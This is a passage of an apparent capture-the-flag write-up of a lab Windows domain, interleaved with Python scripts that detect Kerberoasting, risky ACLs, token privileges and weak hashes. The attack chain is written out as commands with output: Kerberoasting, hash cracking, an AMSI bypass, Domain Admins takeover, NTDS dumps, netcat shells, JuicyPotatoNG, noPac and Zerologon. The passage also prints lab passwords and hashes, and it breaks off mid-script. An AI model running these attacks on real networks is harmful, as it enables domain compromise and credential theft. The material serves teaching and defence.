Use the "--show --format=mscash2" options to display all of the cracked passwords reliably
Session completed.

That is not the case for p00_adm, where a different wordlist is needed; in this case we get it using Keyboard-Combinations.txt from seclists.

❯ john -w:/usr/share/seclists/Passwords/Keyboard-Combinations.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (mscash2, MS Cache Hash 2 (DCC2) [PBKDF2-SHA1 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
ZQ!zaq1          (INTRANET.POO/p00_adm)
Use the "--show --format=mscash2" options to display all of the cracked passwords reliably
Session completed.

Checking the credentials at domain level against the DC, only p00_dev's are valid, although at first they give us nothing really interesting.

❯ proxychains -q crackmapexec smb intranet.poo -u p00_dev -p Development1!
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [+] intranet.poo\p00_dev:Development1! 

❯ proxychains -q crackmapexec smb intranet.poo -u p00_adm -p 'ZQ!zaq1'
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [-] intranet.poo\p00_adm:ZQ!zaq1 STATUS_LOGON_FAILURE

To enumerate the domain we can use bloodhound with p00_dev's credentials; all the information is saved into a zip archive.

❯ proxychains -q bloodhound-python -u p00_dev -p Development1! -ns 172.20.128.53 -d intranet.poo -c All --zip --dns-tcp  
INFO: Found AD domain: intranet.poo
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC.intranet.poo
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: DC.intranet.poo
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: COMPATIBILITY.intranet.poo
INFO: Querying computer: DC.intranet.poo
INFO: Done in 01M 07S
INFO: Compressing output into 20230928143853_bloodhound.zip

We upload the zip to bloodhound and, listing all the kerberoastable accounts, we find two interesting ones: the users p00_hr and p00_adm are vulnerable.

We have valid domain credentials, so with GetUserSPNs we can perform kerberoasting and obtain the hashes of the two vulnerable accounts.

❯ proxychains -q impacket-GetUserSPNs intranet.poo/p00_dev:Development1! -request -dc-ip intranet.poo
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName             Name     MemberOf                                      PasswordLastSet             LastLogon                   Delegation 
-------------------------------  -------  --------------------------------------------  --------------------------  --------------------------  ----------
HR_peoplesoft/intranet.poo:1433  p00_hr                                                 2018-05-10 22:32:09.135381  <never>                                
cyber_audit/intranet.poo:443     p00_adm  CN=P00 Help Desk,CN=Users,DC=intranet,DC=poo  2018-05-10 22:26:14.087657  2023-08-20 19:24:12.359050             


Once again the rockyou wordlist won't help us, but if we use the wordlist from before we get the password of the user p00_adm in plaintext.

❯ john -w:/usr/share/seclists/Passwords/Keyboard-Combinations.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])  
Press 'q' or Ctrl-C to abort, almost any other key for status
ZQ!5t4r          (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
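From the defender's side, the GetUserSPNs run above leaves a clear trace on the DC: Security event 4769 records one RC4 (etype 0x17) service-ticket request per SPN account, all from the same client within a couple of seconds. The script below is an added example (not part of this writeup or of Impacket) that parses a constructed CSV export of 4769 records and flags a source requesting RC4 tickets for several user service accounts inside a short window. The field names and the sample rows are assumptions chosen to mirror the 4769 fields; only the account names come from the enumeration above.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                  # etype 23: the ticket type GetUserSPNs requested above
WINDOW = timedelta(minutes=5)    # how close together the requests must be
MIN_DISTINCT_SERVICES = 2        # distinct roastable services that trigger an alert

# Constructed export of Security event 4769 records (not logs from the box):
# request time, requesting account, service account name, ticket etype, client IP.
SAMPLE_4769 = """\
time,account,service,etype,client
2023-09-28T14:40:01,p00_dev@INTRANET.POO,p00_hr,0x17,10.10.14.5
2023-09-28T14:40:02,p00_dev@INTRANET.POO,p00_adm,0x17,10.10.14.5
2023-09-28T14:40:02,p00_dev@INTRANET.POO,DC$,0x12,10.10.14.5
2023-09-28T09:12:00,mr3ks@INTRANET.POO,COMPATIBILITY$,0x12,172.20.128.53
2023-09-28T09:12:05,mr3ks@INTRANET.POO,krbtgt,0x12,172.20.128.53
"""


def parse_4769(text):
    """Turn the CSV export into event dicts with typed fields."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        events.append({
            "time": datetime.fromisoformat(row["time"]),
            "account": row["account"],
            "service": row["service"],
            "etype": int(row["etype"], 16),
            "client": row["client"],
        })
    return events


def is_roastable_request(ev):
    """RC4 service ticket for a user (non-machine, non-KDC) service account.

    Machine accounts have long random passwords and krbtgt tickets are TGTs,
    so neither is worth cracking; an RC4 ticket for a user SPN is the signal."""
    svc = ev["service"]
    return ev["etype"] == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt"


def find_kerberoast_bursts(events, window=WINDOW, min_services=MIN_DISTINCT_SERVICES):
    """Return {(account, client): [services]} for every source that requested RC4
    tickets for at least `min_services` distinct user services inside `window`."""
    by_source = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if is_roastable_request(ev):
            by_source[(ev["account"], ev["client"])].append(ev)

    alerts = {}
    for source, evs in by_source.items():
        for i, start in enumerate(evs):           # sliding window starting at each request
            services = {e["service"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(services) >= min_services:
                alerts[source] = sorted(services)
                break
    return alerts


if __name__ == "__main__":
    for (account, client), services in find_kerberoast_bursts(parse_4769(SAMPLE_4769)).items():
        print(f"[!] possible Kerberoasting by {account} from {client}: {', '.join(services)}")
```

The RC4 condition is what makes this cheap to run: service accounts configured for AES-only tickets never produce etype 0x17 entries, so on a domain where RC4 has been retired any such event is worth a look on its own. Long random passwords on service accounts (or gMSAs) are what make the cracking step in the writeup fail even when the ticket is obtained.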

Back in BloodHound, searching for the shortest paths to Domain Admins, we find that the P00 HELP DESK group, of which the user p00_adm is a member, has the GenericAll privilege over the Domain Admins group we're after.

For the exploitation we can right-click GenericAll and choose Help; the Abuse Info tab explains what the privilege consists of and how to abuse it.

We start by uploading PowerView.ps1 with upload and importing it; however, when we do, we're told it has been blocked by the antivirus for malicious content.

PS C:\Users\Administrator\Documents> upload PowerView.ps1

Info: Uploading PowerView.ps1 to C:\Users\Administrator\Documents\PowerView.ps1

Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1
At C:\Users\Administrator\Documents\PowerView.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.  
At C:\Users\Administrator\Documents\PowerView.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS C:\Users\Administrator\Documents>

We can use the Bypass-4MSI function included in evil-winrm; now the module imports without problems and the antivirus no longer gets in the way.

PS C:\Users\Administrator\Documents> Bypass-4MSI

Info: Patching 4MSI, please be patient...

[+] Success!

PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1  
PS C:\Users\Administrator\Documents>

Following the instructions in BloodHound, we start by defining the credentials of the user p00_adm that we obtained through the Kerberoasting attack.

PS C:\Users\Administrator\Documents> $SecPassword = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
PS C:\Users\Administrator\Documents> $Cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $SecPassword)  
PS C:\Users\Administrator\Documents>

Now we add the user p00_adm to Domain Admins, taking advantage of the privilege.

PS C:\Users\Administrator\Documents> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $Cred  
PS C:\Users\Administrator\Documents>
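The path BloodHound found is a DACL problem, and it can be caught without a graph: any control right (GenericAll, WriteDacl, WriteOwner, AddMember and friends) over a Tier-0 object held by a principal that is not itself Tier-0 is a finding. The script below is an added example, not code from the writeup or from BloodHound, that walks a constructed ACE list in the shape a Get-DomainObjectAcl or BloodHound export would give (the dict keys, the trusted-principal list and the sample membership are assumptions) and expands each hit into the concrete accounts that could exercise it.

```python
# Rights that let the trustee take over the object: add members, rewrite the
# DACL, take ownership, or reset a password via extended rights.
CONTROL_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
    "AddMember", "AllExtendedRights", "Owns",
}

# Objects whose compromise equals domain compromise.
TIER0_OBJECTS = {"Domain Admins", "Enterprise Admins", "Administrators", "krbtgt", "AdminSDHolder"}

# Principals expected to hold control rights over those objects.
TRUSTED_PRINCIPALS = {"Domain Admins", "Enterprise Admins", "Administrators", "SYSTEM"}

# Constructed ACE list (not a real export from the box); only the Help Desk ->
# Domain Admins GenericAll edge mirrors what BloodHound showed above.
SAMPLE_ACES = [
    {"object": "Domain Admins", "trustee": "P00 Help Desk", "right": "GenericAll", "inherited": False},
    {"object": "Domain Admins", "trustee": "Domain Admins", "right": "GenericAll", "inherited": False},
    {"object": "Domain Admins", "trustee": "Authenticated Users", "right": "ReadProperty", "inherited": True},
    {"object": "krbtgt", "trustee": "Administrators", "right": "GenericAll", "inherited": False},
    {"object": "p00_adm", "trustee": "P00 Help Desk", "right": "GenericWrite", "inherited": False},
]

# Constructed group membership used to expand a group trustee into users.
SAMPLE_MEMBERSHIP = {"P00 Help Desk": {"p00_adm"}, "Domain Admins": {"mr3ks"}}


def dangerous_aces(aces, tier0=TIER0_OBJECTS, trusted=TRUSTED_PRINCIPALS):
    """ACEs granting a control right over a Tier-0 object to an untrusted trustee."""
    return [
        a for a in aces
        if a["object"] in tier0 and a["right"] in CONTROL_RIGHTS and a["trustee"] not in trusted
    ]


def expand_findings(aces, membership):
    """Map each dangerous ACE to the concrete accounts that can use it."""
    findings = {}
    for ace in dangerous_aces(aces):
        users = membership.get(ace["trustee"], {ace["trustee"]})
        findings[(ace["trustee"], ace["right"], ace["object"])] = sorted(users)
    return findings


if __name__ == "__main__":
    for (trustee, right, obj), users in expand_findings(SAMPLE_ACES, SAMPLE_MEMBERSHIP).items():
        print(f"[!] {trustee} has {right} on {obj}; exercisable by: {', '.join(users)}")
```

One caveat when reading results on a real domain: SDProp copies the DACL of AdminSDHolder onto protected groups such as Domain Admins every 60 minutes by default, so an ACE like this one that survives usually means AdminSDHolder itself carries it; the list of Tier-0 objects above includes AdminSDHolder for that reason. The corresponding event-side control is the membership change itself (event 4728/4732 with Domain Admins as the target group), which the Add-DomainGroupMember call above generates.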

With the p00_adm credential we've defined, we should be able to invoke a command targeting the DC; it runs as p00_adm.

PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc -Credential $Cred -Command { whoami }  
poo\p00_adm
PS C:\Users\Administrator\Documents>

Now we simply search recursively for the flag, which is on the desktop of the user mr3ks, and read it, although we still don't have an interactive shell.

PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc -Credential $Cred -Command { dir C:\Users -recurse flag.txt }

    Directory: C:\Users\mr3ks\Desktop

Mode                LastWriteTime         Length Name              PSComputerName
----                -------------         ------ ----              --------------
-a----       26/03/2018     17:47             37 flag.txt          dc

PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc -Credential $Cred -Command { type C:\Users\mr3ks\Desktop\flag.txt }  
POO{1196ef8bc523f084ad1732a38a0851d6}
PS C:\Users\Administrator\Documents>

With crackmapexec we can verify that p00_adm's credentials are valid and, since we are Domain Admins, we also dump the NTDS hashes.

❯ proxychains -q crackmapexec smb intranet.poo -u p00_adm -p 'ZQ!5t4r'
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [+] intranet.poo\p00_adm:ZQ!5t4r (Pwn3d!)

❯ proxychains -q crackmapexec smb intranet.poo -u p00_adm -p 'ZQ!5t4r' --ntds drsuapi
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)
SMB         intranet.poo    445    DC               [+] intranet.poo\p00_adm:ZQ!5t4r (Pwn3d!)
SMB         intranet.poo    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         intranet.poo    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:4f53a926429fd0e53776ab738b1bccc4:::
SMB         intranet.poo    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f2d5bbdb13be8f3861588493350df289:::
SMB         intranet.poo    445    DC               DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               mr3ks:1000:aad3b435b51404eeaad3b435b51404ee:1f989b7c5df25598ad816e342f69e090:::
SMB         intranet.poo    445    DC               p00_hr:1105:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
SMB         intranet.poo    445    DC               p00_dev:1106:aad3b435b51404eeaad3b435b51404ee:89e178b8eabf074173edb164fb385ad4:::
SMB         intranet.poo    445    DC               p00_adm:1107:aad3b435b51404eeaad3b435b51404ee:a28543372c65db507ce6c266e192594e:::
SMB         intranet.poo    445    DC               DC$:1001:aad3b435b51404eeaad3b435b51404ee:561b89eaff4f6c4c7a6ebf8ed7e7385e:::
SMB         intranet.poo    445    DC               COMPATIBILITY$:1104:aad3b435b51404eeaad3b435b51404ee:bb426464bbe7a8ad0d158c587dcfaf64:::

Something important to keep in mind: although we have the NT hash of the Administrator user, that account is disabled in the domain.

❯ proxychains -q crackmapexec smb intranet.poo -u Administrator -H 4f53a926429fd0e53776ab738b1bccc4
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [-] intranet.poo\Administrator:4f53a926429fd0e53776ab738b1bccc4 STATUS_ACCOUNT_DISABLED

Now, as the user mr3ks or as any domain admin user such as p00_adm, we can connect to the DC over WinRM with pass-the-hash.

❯ proxychains -q evil-winrm -i intranet.poo -u mr3ks -H 1f989b7c5df25598ad816e342f69e090  
PS C:\Users\mr3ks\Documents> whoami
poo\mr3ks
PS C:\Users\mr3ks\Documents> hostname
DC
PS C:\Users\mr3ks\Documents> type ..\Desktop\flag.txt
POO{1196ef8bc523f084ad1732a38a0851d6}
PS C:\Users\mr3ks\Documents>

Or we can also use psexec with the credentials to obtain a shell on the DC as nt authority\system, which is the account with the highest privileges.

❯ proxychains -q impacket-psexec intranet.poo/p00_adm:'ZQ!5t4r'@intranet.poo  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on intranet.poo.....
[*] Found writable share ADMIN$
[*] Uploading file WudsKinB.exe
[*] Opening SVCManager on intranet.poo.....
[*] Creating service zzeo on intranet.poo.....
[*] Starting service zzeo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
DC

C:\Windows\system32> type C:\Users\mr3ks\Desktop\flag.txt
POO{1196ef8bc523f084ad1732a38a0851d6}

C:\Windows\system32>


Extra 1

SeImpersonatePrivilege - Compatibility Administrator


As an alternative, in MSSQL we can use a project that lets us create a proxy through the MSSQL connection. For that we'll use the modified version of mssqlclient.py; we start by running enable_ole and uploading reciclador.dll.

❯ python2 mssqlclient.py intranet.poo/pwned:password123#@10.13.38.11
Impacket v0.11.0 - Copyright 2023 SecureAuth Corporation

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.  
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL> enable_ole
SQL> upload reciclador.dll C:\ProgramData\reciclador.dll
[+] Uploading 'reciclador.dll' to 'C:\ProgramData\reciclador.dll'...
[+] Size is 111616 bytes
[+] Upload completed
SQL>

Now we proceed to install assembly.dll, using the -install and -clr parameters to indicate it; these parameters are part of the modified project.

❯ python2 mssqlclient.py intranet.poo/pwned:password123#@10.13.38.11 -install -clr assembly.dll  
Impacket v0.11.0 - Copyright 2023 SecureAuth Corporation

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[*] Proxy mode: install
[*] CLR enabled
[*] Assembly successfully installed
[*] Procedure successfully installed

Finally we start the reciclador, indicating the path of the dll; when run, it opens a proxy on port 1337 that we can set in the proxychains configuration.

❯ python2 mssqlclient.py intranet.poo/pwned:password123#@10.13.38.11 -start -reciclador 'C:\ProgramData\reciclador.dll'  
Impacket v0.11.0 - Copyright 2023 SecureAuth Corporation

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[*] Proxy mode: check
[*] Assembly is installed
[*] Procedure is installed
[*] reciclador is installed
[*] clr enabled
[*] Proxy mode: start
[*] Listening on port 1337...
[*] ACK from server!

Since we don't have a connection, we can take advantage of this modified mssqlclient version by using its upload function to upload netcat.exe and thus gain a shell.

SQL> upload netcat.exe C:\ProgramData\netcat.exe
[+] Uploading 'netcat.exe' to 'C:\ProgramData\netcat.exe'...  
[+] Size is 43696 bytes
[+] Upload completed
SQL>

Now with xp_cmdshell we run netcat.exe so that it starts a listener on port 4444 and returns an interactive PowerShell when it receives a connection.

SQL> xp_cmdshell C:\ProgramData\netcat.exe -e powershell -lvnp 4444  

Finally, taking advantage of the proxy we created earlier, we can connect to the machine and obtain an interactive PowerShell as the service account.

❯ proxychains -q netcat compatibility.intranet.poo 4444
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\System32> whoami
nt service\mssql$poo_public
PS C:\Windows\System32>

The MSSQL shell as the service account has SeImpersonatePrivilege enabled, which lets us impersonate any user, including nt authority\system.

PS C:\Windows\System32> whoami
nt service\mssql$poo_public
PS C:\Windows\System32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========  
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PS C:\Windows\System32>
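The privilege table above is worth reading mechanically rather than by eye, because the dangerous entries are not only the Enabled ones: a privilege that is merely Disabled is still held by the token and a process can re-enable it, so it counts just the same. The script below is an added example (not from the writeup) that parses the `whoami /priv` output shown above, which is embedded as a constructed sample, and reports the privileges that lead from a service account to SYSTEM; the risk list is an assumption based on the well-known Potato and backup/restore escalation families.

```python
import re

# Privileges that, once a process under an attacker's control holds them,
# lead to SYSTEM or an equivalent (impersonation, token creation, driver
# loading, arbitrary file read/write as backup operator, ...).
ESCALATION_PRIVS = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
}

# Constructed sample: the table `whoami /priv` printed in the MSSQL service shell above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One table row: privilege name, free-text description, state.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege: enabled?} for every row of the table; header lines are skipped."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            privs[m.group(1)] = m.group(3) == "Enabled"
    return privs


def escalation_risks(privs):
    """Risky privileges present in the token, enabled ones first.

    'Disabled' only means not currently enabled; AdjustTokenPrivileges can turn
    it back on, so a held-but-disabled privilege is reported as well."""
    held = [p for p in privs if p in ESCALATION_PRIVS]
    return sorted(held, key=lambda p: (not privs[p], p))


if __name__ == "__main__":
    privs = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for p in escalation_risks(privs):
        print(f"[!] {p}: {'Enabled' if privs[p] else 'Disabled (held)'}")
```

Both hits here come with the SQL Server service account by default, which is why the Potato family is the standard next step from an xp_cmdshell shell. The practical mitigation is to keep xp_cmdshell and CLR disabled so that a SQL login never becomes an OS process in the first place, and to run the service under an account that does not also hold rights elsewhere.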

And although it really gives us nothing new, since we're already Administrator, we can use JuicyPotatoNG to run netcat.exe and leave a listener on port 4444.

PS C:\ProgramData> .\JuicyPotatoNG.exe -t * -p C:\ProgramData\netcat.exe -a '-e powershell -lvnp 4444'  

         JuicyPotatoNG
         by decoder_it & splinter_code

[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[+] CreateProcessAsUser OK
[+] Exploit successful!

PS C:\ProgramData>

When we connect to the port, this time we get a PowerShell as nt authority\system.

❯ proxychains -q netcat compatibility.intranet.poo 4444
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\> whoami
nt authority\system
PS C:\> hostname
COMPATIBILITY
PS C:\>


Extra 2

CVE-2021-42278 / CVE-2021-42287 - DC Administrator


As an alternative we can use noPac; exploiting it with the -shell parameter gives us a cmd as nt authority\system directly on the DC. However, it's important to specify an admin user other than Administrator, since that account is disabled; we can simply impersonate mr3ks.

❯ proxychains -q python3 noPac.py intranet.poo/p00_dev:Development1! -use-ldap -shell -dc-ip 172.20.128.53 --impersonate mr3ks  

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc.intranet.poo
[*] will try to impersonate mr3ks
[*] Adding Computer Account "WIN-VKPDAND9FI1$"
[*] MachineAccount "WIN-VKPDAND9FI1$" password = nKCK**5iG*PI
[*] Successfully added machine account WIN-VKPDAND9FI1$ with password nKCK**5iG*PI.
[*] WIN-VKPDAND9FI1$ object = CN=WIN-VKPDAND9FI1,CN=Computers,DC=intranet,DC=poo
[*] WIN-VKPDAND9FI1$ sAMAccountName == dc
[*] Saving a DC's ticket in dc.ccache
[*] Reseting the machine account to WIN-VKPDAND9FI1$
[*] Restored WIN-VKPDAND9FI1$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating mr3ks
[*] 	Requesting S4U2self
[*] Saving a user's ticket in mr3ks.ccache
[*] Rename ccache to mr3ks_dc.intranet.poo.ccache
[*] Attempting to del a computer with the name: WIN-VKPDAND9FI1$
[-] Delete computer WIN-VKPDAND9FI1$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>


Extra 3

CVE-2020-1472 - DC Administrator


As an alternative we can run the Zerologon vuln against the DC; the server is vulnerable and we manage to change the computer account's password to an empty string.

❯ proxychains -q python3 cve-2020-1472-exploit.py DC 172.20.128.53
Performing authentication attempts...
==========================================================================  
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Authenticating as the DC$ computer account with an empty string as the password, we can do a DCSync and see the NT hashes of all domain users.

❯ proxychains -q crackmapexec smb intranet.poo -u DC$ -p '' --ntds drsuapi
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [+] intranet.poo\DC$: 
SMB         intranet.poo    445    DC               [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         intranet.poo    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         intranet.poo    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:4f53a926429fd0e53776ab738b1bccc4:::
SMB         intranet.poo    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f2d5bbdb13be8f3861588493350df289:::
SMB         intranet.poo    445    DC               DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               mr3ks:1000:aad3b435b51404eeaad3b435b51404ee:1f989b7c5df25598ad816e342f69e090:::
SMB         intranet.poo    445    DC               p00_hr:1105:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
SMB         intranet.poo    445    DC               p00_dev:1106:aad3b435b51404eeaad3b435b51404ee:89e178b8eabf074173edb164fb385ad4:::
SMB         intranet.poo    445    DC               p00_adm:1107:aad3b435b51404eeaad3b435b51404ee:a28543372c65db507ce6c266e192594e:::
SMB         intranet.poo    445    DC               DC$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               COMPATIBILITY$:1104:aad3b435b51404eeaad3b435b51404ee:bb426464bbe7a8ad0d158c587dcfaf64:::
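Comparing the two NTDS dumps on this page (the one taken with p00_adm after the Kerberoasting path and this one after Zerologon) shows the one difference a defender cares about: DC$ now carries `31d6cfe0d16ae931b73c59d7e0c089c0`, the NT hash of the empty password, which a machine account never has on its own. The script below is an added example (not from the writeup, crackmapexec or Impacket) that parses a constructed dump in pwdump shape, accepting both plain lines and crackmapexec's prefixed ones, and reports machine accounts with an empty password, accounts that share a hash, and any LM hashes still stored; the hash values in the sample are made up.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # placeholder meaning no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# One pwdump record: user:rid:lmhash:nthash:::
LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed dump (hashes are made up, not the box's); the first line keeps the
# crackmapexec prefix to show that both shapes are accepted.
SAMPLE_DUMP = """\
SMB         intranet.poo    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000002:::
svc_backup:1108:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
COMPATIBILITY$:1104:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000003:::
"""


def parse_dump(text):
    """Parse pwdump lines; the record is always the last whitespace-separated token,
    so crackmapexec's 'SMB host port name' prefix is skipped automatically."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE.match(line.split()[-1])
        if m:
            e = m.groupdict()
            e["rid"] = int(e["rid"])
            entries.append(e)
    return entries


def audit_dump(entries):
    """Return the weak-credential indicators found in the dump."""
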